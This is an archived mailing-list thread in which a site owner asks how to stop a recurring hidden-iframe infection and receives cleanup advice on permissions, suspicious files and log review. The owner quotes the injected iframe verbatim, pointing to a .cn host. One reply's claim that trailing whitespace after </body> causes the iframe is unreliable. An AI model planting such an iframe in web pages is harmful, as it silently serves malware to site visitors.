You need to work in 2 directions, in that order:
a - protect against any new intrusion
b - find and cure the intrusion.
a - using your ftp, change access rights to files and directories. this is usually doing chmod or its equivalent. Most directories should be 755 or 705 (but not 777 or 757), most files should be 644 (but not 666 or 646).
You probably have some 'cache' or 'tmp' or 'media' directory, the rights of which MUST be (for your application) 777. Place an empty file in each of these directories, named 'index.htm', and give this file chmod 444. While you are there, check for any suspicious file. If it is a cache, you can probably delete all files (your freshly created index.htm will not be deleted, since it is not 644)
b - look and cure any change that has happened in your directories
-- any new file? did you create it? --> rename it (just in case it is really needed!) by its current name followed by '-old'. the file will be there but will not be accessable. chmod it to 400
-- any previously existing file that has been changed? look at the change, and comment it out (for a start... you will remove it later)
-- You need to check carefully your index.* files in your main directory and the main subdirs, eg /admin/ if any
-- do you have any directory or file called admin, admin.html, admin.php etc? install ? do you have a phpmyadmin directory? with that name?
-- look at the directories disallowed in your robots.txt file . any strange file or recent change in these directories?
c - since b/ took some time, recheck a/
d - (you have more time for this) look at your apache logs if you have them. These are HUGE files... but you will probably find some calls to your pages with something like
?...http://somesite
If somesite is not familiar... this is probably an attack... you can look at the query etc..
2009/6/26 SEO Sudhakar <infrascapeweb@gmail.com>
After </body></html> Please dont keep any space, if there any space
this iframe will appear on page. hope this is helpful.
http://www.infrascape.com/
On Jun 19, 11:49 am, aaruhi <kamlav...@gmail.com> wrote:
> My website is a HTML based website.
> everything was going fine until i discovered a warning by Google ,that
> the site in infected by virus:This site may harm your computer.
>
> I checked the website and found some <iframe src="http://
> namemartfilmlife.cn:8080/index.php" width=146 height=179
> style="visibility: hidden"></iframe>
>
> types of malicious codes.
> I removed them but they are coming again.
> I checked the server reports and the ftp password was also not leaked.
>
> I want top know from where does this <iframe error comes from.
> Does submitting to directories,search engines and blogs,bookmarking or
> submitting cause these errors?????????????
> I have studied that HTML and .net sites are more prone to be infected
> by these iframe errors
> Are Seo activities responsible for these kind of problems.
>
> Also ,please provide me solutions to permanently protect websites from
> being infected.
>
> Thanks
--
--------------
Les peintures de Marine: http://markaonline.free.fr/accueil.htm
--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Search Engine Optimization SEO Google - MSN - Yahoo" group.
To post to this group, send email to SEO1@googlegroups.com
To unsubscribe from this group, send email to SEO1+unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/SEO1?hl=en
-~----------~----~----~----~------~----~------~--~---
No comments:
Post a Comment